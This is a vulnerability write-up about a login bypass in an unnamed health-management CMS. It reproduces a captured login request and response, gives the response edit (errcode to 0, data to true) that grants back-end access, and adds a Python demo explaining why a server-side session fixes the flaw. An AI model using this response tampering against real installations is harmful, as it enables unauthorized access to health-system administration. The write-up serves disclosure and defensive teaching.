Login verification bypass in a certain health-management CMS

Category: Security Articles

Preface

    A certain health-management CMS has a login verification bypass: the front end decides whether login succeeded from the JSON response body, so editing the intercepted response is enough to enter the back-end.


1. Vulnerability reproduction


The back-end login page looks like this:

[Screenshot: back-end login page]

Here we enter an arbitrary username, password and phone number, then capture the request with Burp Suite:

POST /FrameWeb/FrameService/Main.ashx?option=func&funcid=login HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 200
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/FrameWeb/FrameView/Login/Login.html
Cookie: JSESSIONID=B8707667A91CA3E1564158F4112158B5; account=admin; mobile=13800000000; chkpwd=false; employeeName=admin; jobName=%E8%B6%85%E7%BA%A7%E7%AE%A1%E7%90%86%E5%91%98; generalType=2

{"_dataid":"login","_type":"","_datatype":"text","_param":{"Account":"123abc","Phone":"13800000000","Pwd":"123456"},"_timestamp":1627660684,"funcid":"login","_sign":"e05b00c8e171f6890ae37539037bea61"}

Then choose to intercept the response:


HTTP/1.1 200
Server: nginx
Date: Fri, 30 Jul 2021 16:00:33 GMT
Content-Type: application/json;charset=UTF-8
Content-Length: 47
Connection: close
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: http://39.107.192.171
Vary: Origin
Access-Control-Expose-Headers: Set-Cookie

{"errcode":"1","errmsg":"无此用户",data:{}}

Here we change the errcode value to 0, set the data value to true, and forward the response; the login then succeeds.

[Screenshot: successful login to the back-end]
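The bypass above only works because the browser, not the server, decides that login succeeded: on errcode 0 the front end writes its own identity cookies (the captured request already carries account, generalType and chkpwd cookies) and later pages trust them. The following added example, which is not the CMS's code and whose user store, cookie names and page handlers are all assumed, contrasts that pattern with one where the server mints a random session id only after verifying credentials and authorizes later requests from its own session table. The same response edit is applied to both; it grants access only in the flawed design.

```python
"""Client-trusted login flag vs. server-side session (added illustration).

Nothing here is the CMS's code. The user table, cookie names and page
handlers are assumptions made for the demonstration.
"""
import hashlib
import hmac
import secrets

# Constructed sample user store; the password is kept as a salted SHA-256 hash.
_SALT = b"constructed-salt"
_USERS = {
    "admin": {
        "phone": "13800000000",
        "pwd_hash": hashlib.sha256(_SALT + b"correct-horse").hexdigest(),
    }
}


def _check_credentials(account: str, phone: str, pwd: str) -> bool:
    """Verify account/phone/password against the store with a constant-time compare."""
    user = _USERS.get(account)
    if user is None or user["phone"] != phone:
        return False
    candidate = hashlib.sha256(_SALT + pwd.encode()).hexdigest()
    return hmac.compare_digest(candidate, user["pwd_hash"])


# --- Flawed design: the browser decides "logged in" from the response body.
def flawed_server_login(account: str, phone: str, pwd: str) -> dict:
    if _check_credentials(account, phone, pwd):
        return {"errcode": "0", "errmsg": "", "data": {"account": account}}
    return {"errcode": "1", "errmsg": "no such user", "data": {}}


def flawed_client_handle(response: dict, typed_account: str) -> dict:
    """Assumed front-end logic: on errcode 0, write identity cookies itself."""
    if response["errcode"] == "0":
        return {"account": typed_account, "generalType": "2", "chkpwd": "false"}
    return {}


def flawed_admin_page(cookies: dict) -> bool:
    """Assumed back-end page that trusts the client-written role cookie."""
    return cookies.get("generalType") == "2"


# --- Hardened design: the server keeps the session and mints the id itself.
_SESSIONS: dict = {}


def hardened_server_login(account: str, phone: str, pwd: str) -> dict:
    if _check_credentials(account, phone, pwd):
        sid = secrets.token_hex(16)           # unguessable, server-generated
        _SESSIONS[sid] = {"account": account, "role": "admin"}
        return {"errcode": "0", "errmsg": "", "data": {}, "set_cookie": {"sid": sid}}
    return {"errcode": "1", "errmsg": "no such user", "data": {}}


def hardened_admin_page(cookies: dict) -> bool:
    """Authorize from the server-side session table, never from client claims."""
    sess = _SESSIONS.get(cookies.get("sid", ""))
    return sess is not None and sess["role"] == "admin"


def tamper(response: dict) -> dict:
    """Simulate the intercepted-response edit from the write-up (errcode -> 0, data -> true)."""
    forged = dict(response)
    forged["errcode"] = "0"
    forged["data"] = True
    return forged


def demo() -> tuple:
    """Return (flawed_access, hardened_access, legitimate_access)."""
    wrong = ("123abc", "13800000000", "123456")   # the bogus credentials from the capture
    # Flawed: forged response -> client writes cookies -> page trusts them.
    flawed_access = flawed_admin_page(
        flawed_client_handle(tamper(flawed_server_login(*wrong)), wrong[0]))
    # Hardened: forged response carries no server-minted session id.
    forged = tamper(hardened_server_login(*wrong))
    hardened_access = hardened_admin_page(forged.get("set_cookie", {}))
    # Hardened with real credentials still works.
    good = hardened_server_login("admin", "13800000000", "correct-horse")
    legit_access = hardened_admin_page(good["set_cookie"])
    return flawed_access, hardened_access, legit_access


if __name__ == "__main__":
    print(demo())   # (True, False, True)
```

Running demo() shows the point: the edited response still reads "errcode 0" in both designs, but only the flawed back-end lets the forged state through, because it never consults anything the attacker could not have written. A fix for the real CMS therefore lies on the server side (issue the session only after verification and check it on every back-end request), not in hiding the error message from the client.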


This article was first published on the WeChat public account F12sec: "Login verification bypass in a certain health-management CMS".
